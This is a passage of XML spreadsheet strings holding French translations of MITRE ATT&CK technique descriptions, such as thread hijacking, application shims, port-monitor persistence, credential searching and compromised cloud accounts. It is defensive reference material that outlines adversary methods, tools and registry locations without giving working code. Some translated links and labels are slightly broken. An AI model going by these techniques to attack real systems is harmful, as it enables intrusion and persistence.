    <t>Les adversaires peuvent abuser des utilitaires qui permettent l’exécution de commandes pour contourner les restrictions de sécurité qui limitent l’utilisation des interpréteurs de ligne de commande. Divers utilitaires Windows peuvent être utilisés pour exécuter des commandes, éventuellement sans invoquer [cmd](https://attack.mitre.org/software/S0106). Par exemple, [Forfiles](https://attack.mitre.org/software/S0193), l’Assistant de compatibilité des programmes (pcalua.exe), les composants du sous-système Windows pour Linux (WSL), Scriptrunner.exe, ainsi que d’autres utilitaires peuvent appeler l’exécution de programmes et de commandes à partir d’un [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), d’une fenêtre d’exécution ou via des scripts. (Citation : VectorSec ForFiles août 2017)(Citation : evi1cg forfiles novembre 2017)(Citation : Équipe sécurisée - Scriptrunner.exe)(Référence : SS64)(Citation : Ordinateur qui bipe - Scriptrunner.exe)
Les adversaires peuvent abuser de ces fonctionnalités pour [Defense Evasion](https://attack.mitre.org/tactics/TA0005), en particulier pour effectuer une exécution arbitraire tout en contournant les détections et/ou les contrôles d’atténuation (tels que la stratégie de groupe) qui limitent/empêchent l’utilisation de [cmd](https://attack.mitre.org/software/S0106) ou d’extensions de fichiers plus couramment associées à des charges utiles malveillantes.
https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’attaquer aux systèmes, éventuellement ceux situés sur des réseaux déconnectés ou isolés, en copiant des logiciels malveillants sur des supports amovibles et en tirant parti des fonctionnalités Autorun lorsque le support est inséré dans un système et s’exécute. Dans le cas du mouvement latéral, cela peut se produire en modifiant les fichiers exécutables stockés sur des supports amovibles ou en copiant des logiciels malveillants et en les renommant pour qu’ils ressemblent à des fichiers légitimes afin d’inciter les utilisateurs à l’exécuter sur un système distinct. Dans le cas de l’accès initial, cela peut se produire par le biais d’une manipulation manuelle du support, d’une modification des systèmes utilisés pour formater initialement le support ou d’une modification du micrologiciel du support lui-même.
Les appareils mobiles peuvent également être utilisés pour infecter les PC avec des logiciels malveillants s’ils sont connectés via USB. (Citation : Exploitation de l’USB du smartphone) Cette infection peut être réalisée à l’aide d’appareils (Android, iOS, etc.) et, dans certains cas, de câbles de charge USB. (Citation : Un logiciel malveillant Windows infecte Android)(Citation : Piratage du câble de charge de l’iPhone) Par exemple, lorsqu’un smartphone est connecté à un système, il peut sembler être monté de la même manière qu’un lecteur de disque connecté par USB. Si un logiciel malveillant compatible avec le système connecté se trouve sur l’appareil mobile, le logiciel malveillant peut infecter l’ordinateur (en particulier si les fonctionnalités d’exécution automatique sont activées).
https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sources de système locales, telles que des systèmes de fichiers et des fichiers de configuration ou des bases de données locales, pour trouver des fichiers d’intérêt et des données sensibles avant l’exfiltration.
Les adversaires peuvent le faire à l’aide d’un [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), tel que [cmd](https://attack.mitre.org/software/S0106) ainsi que d’une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), qui ont la fonctionnalité d’interagir avec le système de fichiers pour collecter des informations. (Référence : show_run_config_cmd_cisco) Les adversaires peuvent également utiliser [Collecte automatisée](https://attack.mitre.org/techniques/T1119) sur le système local.
https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Fichiers ou informations obfusqués](https://attack.mitre.org/techniques/T1027) pour masquer les artefacts d’une intrusion à l’analyse. Ils peuvent avoir besoin de mécanismes distincts pour décoder ou débrouiller ces informations en fonction de la façon dont ils ont l’intention de les utiliser. Les méthodes pour ce faire incluent la fonctionnalité intégrée des logiciels malveillants ou l’utilisation d’utilitaires présents sur le système.
Un tel exemple est l’utilisation de [certutil](https://attack.mitre.org/software/S0160) pour décoder un fichier exécutable portable d’outil d’accès à distance qui a été caché dans un fichier de certificat. (Citation : Attaque ciblée de Malwarebytes contre l’Arabie saoudite) Un autre exemple est l’utilisation de la commande Windows &lt;code&gt;copy /b&lt;/code&gt; pour réassembler des fragments binaires en une charge utile malveillante. (Citation : Obfuscation du noir de carbone septembre 2016)
Parfois, l’action d’un utilisateur peut être nécessaire pour l’ouvrir à des fins de désobfuscation ou de déchiffrement dans le cadre de [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). L’utilisateur peut également être tenu de saisir un mot de passe pour ouvrir un fichier compressé/chiffré protégé par un mot de passe qui a été fourni par l’adversaire. (Citation : Volexity PowerDuke, novembre 2016)
https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des règles de Microsoft Outlook pour obtenir la persistance sur un système compromis. Les règles Outlook permettent à un utilisateur de définir un comportement automatisé pour gérer les messages électroniques. Une règle bénigne peut, par exemple, déplacer automatiquement un e-mail vers un dossier particulier dans Outlook s’il contient des mots spécifiques provenant d’un expéditeur spécifique. Des règles Outlook malveillantes peuvent être créées et déclencher l’exécution de code lorsqu’un adversaire envoie un e-mail spécialement conçu à cet utilisateur. (Citation : Règles SilentBreak Outlook)
Une fois que des règles malveillantes ont été ajoutées à la boîte aux lettres de l’utilisateur, elles sont chargées au démarrage d’Outlook. Des règles malveillantes s’exécutent lorsqu’un adversaire envoie un e-mail spécialement conçu à l’utilisateur. (Citation : Règles SilentBreak Outlook)
https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier de manière malveillante des composants de l’environnement d’une victime afin d’entraver ou de désactiver les mécanismes défensifs. Cela implique non seulement d’altérer les défenses préventives, telles que les pare-feu et les antivirus, mais aussi les capacités de détection que les défenseurs peuvent utiliser pour auditer l’activité et identifier les comportements malveillants. Cela peut également couvrir à la fois les défenses natives et les fonctionnalités supplémentaires installées par les utilisateurs et les administrateurs.
Les adversaires peuvent également entraver les opérations de routine qui contribuent à l’hygiène défensive, telles que le blocage de la déconnexion des utilisateurs, l’arrêt d’un système ou la désactivation ou la modification du processus de mise à jour. Les adversaires peuvent également cibler les mécanismes d’agrégation et d’analyse d’événements, ou perturber ces procédures en modifiant d’autres composants du système. Ces restrictions peuvent permettre des opérations malveillantes ainsi que la propagation continue d’incidents. (Référence : Google Cloud Mandiant UNC3886 2024)(Citation : arrêt d’Emotet)
https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes cloud qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes cloud compromis pour poursuivre leurs opérations, notamment en exploitant des services de stockage cloud tels que Dropbox, Microsoft OneDrive ou des compartiments AWS S3 pour [Exfiltration vers le stockage cloud](https://attack.mitre.org/techniques/T1567/002) ou vers [Outil de chargement](https://attack.mitre.org/techniques/T1608/002). Les comptes cloud peuvent également être utilisés dans l’acquisition d’infrastructures, telles que l’infrastructure [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003) ou l’infrastructure [Serverless](https://attack.mitre.org/techniques/T1583/007). De plus, les services de messagerie basés sur le cloud, tels que Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service) ou AWS SES (Simple Email Service) peuvent être utilisés pour le spam ou le [hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation : Netcraft SendGrid 2024) La compromission des comptes cloud peut permettre aux adversaires de développer des fonctionnalités sophistiquées sans gérer leurs propres serveurs. (Citation : Awake Security C2 Cloud)
Il existe diverses méthodes pour compromettre les comptes cloud, telles que la collecte d’informations d’identification via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’informations d’identification sur des sites tiers, la réalisation d’attaques [Password Spraying](https://attack.mitre.org/techniques/T1110/003) ou la tentative de [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation : MSTIC Nobelium Oct 2021) Avant de compromettre les comptes cloud, les adversaires peuvent effectuer des opérations Reconnaissance pour éclairer les décisions sur les comptes à compromettre pour poursuivre leur opération. Dans certains cas, les adversaires peuvent cibler des comptes de fournisseurs de services privilégiés dans le but de tirer parti d’une [relation de confiance](https://attack.mitre.org/techniques/T1199) entre les fournisseurs de services et leurs clients. (Citation : MSTIC Nobelium octobre 2021)
https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes de messagerie qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes de messagerie compromis pour poursuivre leurs opérations, par exemple en les exploitant pour mener des campagnes de [phishing pour information](https://attack.mitre.org/techniques/T1598), [de phishing](https://attack.mitre.org/techniques/T1566) ou de spam à grande échelle. L’utilisation d’un personnage existant avec un compte de messagerie compromis peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation avec le personnage compromis ou si elle le connaît. Les comptes de messagerie compromis peuvent également être utilisés dans l’acquisition d’infrastructures (ex : [Domaines](https://attack.mitre.org/techniques/T1583/001)).
Il existe diverses méthodes pour compromettre les comptes de messagerie, telles que la collecte d’identifiants via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’identifiants sur des sites tiers, le filtrage par force brute d’identifiants (par exemple, la réutilisation de mots de passe à partir de vidages d’identifiants de violation) ou le paiement d’employés, de fournisseurs ou de partenaires commerciaux pour l’accès aux identifiants. (Citation : AnonHBGary)(Référence : Microsoft DEV-0537) Avant de compromettre les comptes de messagerie, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations. Les adversaires peuvent cibler des comptes de messagerie ou des domaines bien connus compromettants à partir desquels des spams malveillants ou des e-mails [https://attack.mitre.org/techniques/T1566 de phishing peuvent contourner les règles de filtrage des e-mails basées sur la réputation.
Les adversaires peuvent utiliser un compte de messagerie compromis pour détourner des fils d’e-mails existants avec des cibles d’intérêt.
https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des groupes locaux ou de domaine supplémentaires à un compte contrôlé par l’adversaire afin de maintenir un accès persistant à un système ou à un domaine.
Sous Windows, les comptes peuvent utiliser les commandes 'net localgroup' et 'net group' pour ajouter des utilisateurs existants à des groupes locaux et de domaine. (Citation : Microsoft Net Localgroup)(Citation : Microsoft Net Group) Sous Linux, les adversaires peuvent utiliser la commande 'usermod' dans le même but. (Citation : Linux Usermod)
Par exemple, des comptes peuvent être ajoutés au groupe d’administrateurs locaux sur les appareils Windows pour conserver des privilèges élevés. Ils peuvent également être ajoutés au groupe Utilisateurs Bureau à distance, ce qui leur permet d’utiliser [Protocole Bureau à distance](https://attack.mitre.org/techniques/T1021/001) pour se connecter aux points de terminaison à l’avenir. (Citation : Connexions RDP Microsoft) Sous Linux, des comptes peuvent être ajoutés au groupe sudoers, ce qui leur permet d’exploiter de manière persistante [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) pour obtenir des privilèges élevés. 
Dans les environnements Windows, les comptes d’ordinateur peuvent également être ajoutés aux groupes de domaines. Cela permet au compte SYSTEM local d’obtenir des privilèges sur le domaine. (Citation : Détection RootDSE AD 2022)
https://attack.mitre.org/techniques/T1098/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger des logiciels malveillants sur une infrastructure tierce ou contrôlée par l’adversaire pour les rendre accessibles pendant le ciblage. Les logiciels malveillants peuvent inclure des charges utiles, des droppers, des outils de post-compromission, des portes dérobées et divers autres contenus malveillants. Les adversaires peuvent télécharger des logiciels malveillants pour soutenir leurs opérations, par exemple en mettant une charge utile à la disposition d’un réseau victime pour permettre le [transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105) en la plaçant sur un serveur Web accessible sur Internet.
Les logiciels malveillants peuvent être placés sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). Les logiciels malveillants peuvent également être hébergés sur des services Web, tels que GitHub ou Pastebin, ou sur l’InterPlanetary File System (IPFS), où le stockage de contenu décentralisé rend difficile la suppression des fichiers malveillants. (Citation : Volexity Ocean Lotus novembre 2020)(Référence : Talos IPFS 2022)
Les adversaires peuvent télécharger des fichiers dérobés, tels que des fichiers binaires d’application, des images de machine virtuelle ou des images de conteneur, vers des magasins de logiciels ou des référentiels tiers (par exemple : GitHub, CNET, AWS Community AMI, Docker Hub). Par hasard, les victimes peuvent télécharger/installer directement ces fichiers dérobés via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquage](https://attack.mitre.org/techniques/T1036) peut augmenter le risque que les utilisateurs exécutent ces fichiers par erreur.
https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les produits ou les mécanismes de livraison des produits avant leur réception par un consommateur final dans le but de compromettre les données ou le système.
La compromission de la chaîne d’approvisionnement peut avoir lieu à n’importe quelle étape de la chaîne d’approvisionnement, y compris :
* Manipulation des outils de développement
* Manipulation d’un environnement de développement
* Manipulation de dépôts de code source (publics ou privés)
* Manipulation du code source dans les dépendances open-source
* Manipulation des mécanismes de mise à jour/distribution de logiciels
* Images système compromises/infectées (plusieurs cas de supports amovibles infectés en usine) (Citation : IBM Storwize) (Citation : Schneider Electric USB Malware) 
* Remplacement des logiciels légitimes par des versions modifiées
* Vente de produits modifiés/contrefaits à des distributeurs légitimes
* Interdiction d’expédition
Bien que la compromission de la chaîne d’approvisionnement puisse avoir un impact sur n’importe quel composant du matériel ou des logiciels, les adversaires qui cherchent à obtenir une exécution se sont souvent concentrés sur les ajouts malveillants à des logiciels légitimes dans les canaux de distribution ou de mise à jour de logiciels. (Citation : Avast CCleaner3 2018)(Citation : Microsoft Dofoil 2018)(Référence : Command Five SK 2011) Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou les logiciels malveillants peuvent être distribués à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires sur des victimes spécifiques. (Référence : Symantec Elderwood, septembre 2012)(Citation : Avast CCleaner3 2018)(Référence : Command Five SK 2011) Les projets open source populaires qui sont utilisés comme dépendances dans de nombreuses applications peuvent également être ciblés comme moyen d’ajouter du code malveillant aux utilisateurs de la dépendance. (Citation : Compromis NPM de Trendmicro)
https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exploiter une faiblesse d’un hôte ou d’un système connecté à Internet pour accéder initialement à un réseau. La faiblesse du système peut être un bogue logiciel, un problème temporaire ou une mauvaise configuration.
Les applications exploitées sont souvent des sites Web/serveurs Web, mais peuvent également inclure des bases de données (comme SQL), des services standard (comme SMB ou SSH), des protocoles d’administration et de gestion des périphériques réseau (comme SNMP et Smart Install) et tout autre système avec des sockets ouverts accessibles sur Internet. (Référence : NVD CVE-2016-6662)(Citation : Vulnérabilités multiples des PME de la CIS)(Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation : Blog Cisco Legacy Device Attacks)(Référence : NVD CVE-2014-7169) En fonction de la faille exploitée, il peut également s’agir d’une [Exploitation pour l’évasion de la défense](https://attack.mitre.org/techniques/T1211) ou d’une [Exploitation pour l’exécution du client](https://attack.mitre.org/techniques/T1203).
Si une application est hébergée sur une infrastructure basée sur le cloud et/ou est conteneurisée, son exploitation peut entraîner la compromission de l’instance ou du conteneur sous-jacent. Cela peut permettre à un adversaire d’accéder aux API de cloud ou de conteneur (par exemple, via l’API de métadonnées d’instance cloud](https://attack.mitre.org/techniques/T1552/005)), d’exploiter l’accès à l’hôte de conteneur via [Escape to Host](https://attack.mitre.org/techniques/T1611) ou de tirer parti de politiques de gestion des identités et des accès faibles.
Les adversaires peuvent également exploiter l’infrastructure du réseau de périphérie et les appliances associées, en ciblant spécifiquement les appareils qui ne prennent pas en charge des défenses robustes basées sur l’hôte. (Citation : Mandiant Fortinet Zero Day)(Citation : Cyberguerre câblée de la Russie)
Pour les sites Web et les bases de données, le top 10 de l’OWASP et le top 25 du CWE mettent en évidence les vulnérabilités Web les plus courantes. (Citation : OWASP Top 10)(Citation : CWE top 25)
https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de contourner l’authentification Kerberos en volant ou en falsifiant des tickets Kerberos pour activer [Transmettre le ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos est un protocole d’authentification largement utilisé dans les environnements de domaine Windows modernes. Dans les environnements Kerberos, appelés « domaines », il y a trois participants de base : le client, le service et le centre de distribution de clés (KDC). (Citation : Décodeur en anneau Kerberos ADSecurity) Les clients demandent l’accès à un service et, grâce à l’échange de tickets Kerberos, provenant de KDC, ils se voient accorder l’accès après s’être authentifiés avec succès. Le KDC est responsable à la fois de l’authentification et de l’attribution des billets.  Les adversaires peuvent tenter d’abuser de Kerberos en volant des billets ou en falsifiant des billets pour permettre un accès non autorisé.
Sous Windows, l’utilitaire &lt;code&gt;klist&lt;/code&gt; intégré peut être utilisé pour répertorier et analyser les tickets Kerberos mis en cache. (Citation : Microsoft Klist)
https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des emplacements de stockage de mots de passe courants pour obtenir les informations d’identification de l’utilisateur. (Citation : F-Secure The Dukes) Les mots de passe sont stockés à plusieurs endroits sur un système, en fonction du système d’exploitation ou de l’application contenant les informations d’identification. Il existe également des applications et des services spécifiques qui stockent les mots de passe pour faciliter leur gestion et leur maintenance, tels que les gestionnaires de mots de passe et les coffres-forts de secrets dans le cloud. Une fois les informations d’identification obtenues, elles peuvent être utilisées pour effectuer des mouvements latéraux et accéder à des informations restreintes.
https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe légitime existant pour exfiltrer des données plutôt que leur canal de commande et de contrôle principal. Les services Web populaires agissant comme un mécanisme d’exfiltration peuvent offrir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant la compromission. Des règles de pare-feu peuvent également déjà exister pour autoriser le trafic vers ces services.
Les fournisseurs de services Web utilisent également couramment le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>Un adversaire peut utiliser un logiciel de support de bureau et d’accès à distance légitime pour établir un canal de commande et de contrôle interactif afin de cibler les systèmes au sein des réseaux. Ces services, tels que « VNC », « Team Viewer », « AnyDesk », « ScreenConnect », « LogMein », « AmmyyAdmin » et d’autres outils de surveillance et de gestion à distance (RMM), sont couramment utilisés en tant que logiciels de support technique légitimes et peuvent être autorisés par le contrôle des applications dans un environnement cible. (Citation : Symantec vivant de la terre)(Citation : Rapport sur les menaces mondiales 2015 de CrowdStrike)(Citation : CrySyS Blog TeamSpy)
Un logiciel d’accès à distance peut être installé et utilisé après la compromission comme canal de communication alternatif pour un accès redondant ou comme moyen d’établir une session de bureau à distance interactive avec le système cible. Ils peuvent également être utilisés comme composant d’un logiciel malveillant pour établir une connexion inverse ou une rétroconnexion à un service ou à un système contrôlé par l’adversaire.
De la même manière, les adversaires peuvent abuser des fonctionnalités de réponse incluses dans l’EDR et d’autres outils défensifs qui permettent un accès à distance.
L’installation de nombreux logiciels d’accès à distance peut également inclure la persistance (par exemple, la routine d’installation du logiciel crée un [service Windows](https://attack.mitre.org/techniques/T1543/003)). Des modules/fonctionnalités d’accès à distance peuvent également exister dans le cadre de logiciels existants (par exemple, le bureau à distance de Google Chrome). (Citation : Bureau à distance Google Chrome)(Citation : Bureau à distance Chrome)
https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir des domaines qui peuvent être utilisés lors du ciblage. Les noms de domaine sont les noms lisibles par l’homme utilisés pour représenter une ou plusieurs adresses IP. Ils peuvent être achetés ou, dans certains cas, acquis gratuitement.
Les adversaires peuvent utiliser les domaines acquis à diverses fins, notamment pour le [phishing](https://attack.mitre.org/techniques/T1566), la [compromission intempestive](https://attack.mitre.org/techniques/T1189) et le contrôle et la commande. (Citation : CISA MSS septembre 2020) Les adversaires peuvent choisir des domaines similaires à des domaines légitimes, notamment en utilisant des homoglyphes ou en utilisant un domaine de premier niveau (TLD) différent. (Référence : FireEye APT28)(Citation : PaypalScam) Le typosquatting peut être utilisé pour faciliter la livraison de charges utiles via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Les adversaires peuvent également utiliser des noms de domaine internationalisés (IDN) et des jeux de caractères différents (par exemple, cyrillique, grec, etc.) pour exécuter des « attaques homographes IDN », créant ainsi des domaines visuellement similaires utilisés pour diffuser des logiciels malveillants aux machines victimes. (Référence : CISA IDN ST05-016)(Référence : tt_httrack_fake_domains)(Référence : tt_obliqueRAT)(Référence : httrack_unhcr)(Référence : lazgroup_idn_phishing)
Différentes URI/URL peuvent également être générées dynamiquement pour diffuser de manière unique du contenu malveillant aux victimes (y compris des noms de domaine à usage unique et uniques). (Citation : Schéma d’URL iOS)(Citation : URI)(citation : utilisation de l’URI)(citation : URI unique)
Les adversaires peuvent également acquérir et réaffecter des domaines expirés, qui peuvent être déjà autorisés ou approuvés par les défenseurs sur la base d’une réputation ou d’un historique existant. (Référence : Categorisation_not_boundary)(Référence : Domain_Steal_CC)(Référence : Redirectors_Domain_Fronting)(Référence : bypass_webproxy_filtering)
Les bureaux d’enregistrement de domaines gèrent chacun une base de données accessible au public qui affiche les informations de contact de chaque domaine enregistré. Les services WHOIS privés affichent des informations alternatives, telles que leurs propres données d’entreprise, plutôt que le propriétaire du domaine. Les adversaires peuvent utiliser ces services WHOIS privés pour masquer des informations sur le propriétaire d’un domaine acheté. Les adversaires peuvent interrompre les efforts de suivi de leur infrastructure en utilisant des informations d’enregistrement variées et en achetant des domaines auprès de différents bureaux d’enregistrement de domaines. (Référence : Mandiant APT1)
En plus d’acheter légitimement un domaine, un adversaire peut enregistrer un nouveau domaine dans un environnement compromis. Par exemple, dans les environnements AWS, les adversaires peuvent tirer parti du service de domaine Route53 pour enregistrer un domaine et créer des zones hébergées pointant vers des ressources choisies par l’acteur malveillant. (Citation : Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>Un adversaire peut compresser ou chiffrer les données collectées avant l’exfiltration à l’aide de bibliothèques tierces. Il existe de nombreuses bibliothèques qui peuvent archiver des données, notamment [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation : PyPI RAR), libzip (Citation : libzip) et zlib (Citation : Zlib Github). La plupart des bibliothèques incluent des fonctionnalités permettant de chiffrer et/ou de compresser des données.
Certaines bibliothèques d’archives sont préinstallées sur les systèmes, telles que bzip2 sur macOS et Linux, et zip sur Windows. Notez que les bibliothèques sont différentes des utilitaires. Les bibliothèques peuvent être liées lors de la compilation, tandis que les utilitaires nécessitent la création d’un sous-shell ou d’un mécanisme d’exécution similaire.
https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus piratés afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le détournement d’exécution de thread est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Le détournement de threads est généralement effectué en suspendant un processus existant, puis en démappant/vidant sa mémoire, qui peut ensuite être remplacée par un code malveillant ou le chemin d’accès à une DLL. Un handle vers un processus victime existant est d’abord créé à l’aide d’appels d’API Windows natifs tels &lt;code&gt;qu’OpenThread&lt;/code&gt;. À ce stade, le processus peut être suspendu, puis écrit, réaligné sur le code injecté et repris via &lt;code&gt;SuspendThread&lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, puis &lt;code&gt;ResumeThread&lt;/code&gt; respectivement. (Citation : Injection de processus élastique juillet 2017)
Ceci est très similaire à [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), mais cible un processus existant plutôt que de créer un processus dans un état suspendu.  
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. Le détournement d’exécution peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de manipuler les caractéristiques de leurs artefacts pour les faire paraître légitimes ou bénins aux utilisateurs et/ou aux outils de sécurité. Le masquage se produit lorsque le nom ou l’emplacement d’un objet, légitime ou malveillant, est manipulé ou abusé dans le but d’échapper aux défenses et à l’observation. Il peut s’agir de manipuler les métadonnées des fichiers, d’inciter les utilisateurs à mal identifier le type de fichier et de donner des noms de tâches ou de services légitimes.
Renommer des utilitaires système abusifs pour échapper à la surveillance de sécurité est également une forme de [Masquerading](https://attack.mitre.org/techniques/T1036). (Citation : Site principal de LOLBAS)
https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des shims d’application. L’infrastructure/cadre de compatibilité des applications Microsoft Windows (Application Shim) a été créé pour permettre la rétrocompatibilité des logiciels à mesure que la base de code du système d’exploitation change au fil du temps. Par exemple, la fonctionnalité de shimming d’application permet aux développeurs d’appliquer des correctifs aux applications (sans réécrire le code) qui ont été créées pour Windows XP afin qu’elles fonctionnent avec Windows 10. (Citation : Injection de processus élastique juillet 2017)
Dans le cadre, les shims sont créés pour agir comme un tampon entre le programme (ou plus précisément, la table d’adresses d’importation) et le système d’exploitation Windows. Lorsqu’un programme est exécuté, le cache shim est référencé pour déterminer si le programme nécessite l’utilisation de la base de données shim (.sdb). Si c’est le cas, la base de données shim utilise l’accrochage pour rediriger le code si nécessaire afin de communiquer avec le système d’exploitation. 
Une liste de tous les shims actuellement installés par l’installateur Windows par défaut (sdbinst.exe) est conservée dans :
* &lt;code&gt;%WINDIR %\AppPatch\sysmain.sdb&lt;/code&gt; et
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Les bases de données personnalisées sont stockées dans :
* &lt;code&gt;%WINDIR %\AppPatch\custom &amp; %WINDIR %\AppPatch\AppPatch64\Custom&lt;/code&gt; et
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
Pour assurer la sécurité des shim, Windows les a conçus pour qu’ils s’exécutent en mode utilisateur afin qu’ils ne puissent pas modifier le noyau et que vous disposiez de privilèges d’administrateur pour installer un shim. Toutefois, certains shims peuvent être utilisés pour [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002) (UAC et RedirectEXE), injecter des DLL dans les processus (InjectDLL), désactiver la prévention de l’exécution des données (DisableNX) et la gestion des exceptions de structure (DisableSEH) et intercepter les adresses de mémoire (GetProcAddress).
L’utilisation de ces shims peut permettre à un adversaire d’effectuer plusieurs actes malveillants tels que l’élévation des privilèges, l’installation de portes dérobées, la désactivation de défenses telles que Windows Defender, etc. Les shims peuvent également être utilisés de manière abusive pour établir la persistance en étant continuellement invoqués par les programmes affectés.
https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent fouiller des systèmes compromis pour trouver et obtenir des informations d’identification stockées de manière non sécurisée. Ces informations d’identification peuvent être stockées et/ou égarées à de nombreux endroits d’un système, y compris des fichiers en texte brut (par exemple, [Bash History](https://attack.mitre.org/techniques/T1552/003)), des référentiels spécifiques au système d’exploitation ou à une application (par exemple, [Informations d’identification dans le registre](https://attack.mitre.org/techniques/T1552/002)), ou d’autres fichiers/artefacts spécialisés (par exemple, [Clés privées](https://attack.mitre.org/techniques/T1552/004)). (Citation : Brining MimiKatz à Unix)
https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des moniteurs de port pour exécuter une DLL fournie par l’adversaire lors du démarrage du système à des fins de persistance ou d’élévation de privilèges. Un moniteur de port peut être configuré via l’appel d’API &lt;code&gt;AddMonitor&lt;/code&gt; pour définir une DLL à charger au démarrage. (Citation : AddMonitor) Cette DLL peut se trouver dans &lt;code&gt;C :\Windows\System32&lt;/code&gt; et sera chargée et exécutée par le service de spouleur d’impression, 'spoolsv.exe', sous les permissions de niveau SYSTÈME au démarrage. (Référence : Bloxham) 
Une DLL arbitraire peut également être chargée si les autorisations permettent d’écrire un chemin d’accès complet pour cette DLL dans la valeur « Driver » d’une sous-clé existante ou nouvelle nommée arbitrairement de &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. La clé de registre contient les entrées suivantes :
* Port local
* Port TCP/IP standard
* Moniteur USB
* Port WSD
https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le courrier et les données de l’application de courrier pour supprimer les preuves de leur activité. Les applications de messagerie permettent aux utilisateurs et à d’autres programmes d’exporter et de supprimer des données de boîte aux lettres via des outils de ligne de commande ou à l’aide d’API. Les données de l’application de messagerie peuvent être des e-mails, des métadonnées d’e-mail ou des journaux générés par l’application ou le système d’exploitation, tels que des demandes d’exportation. 
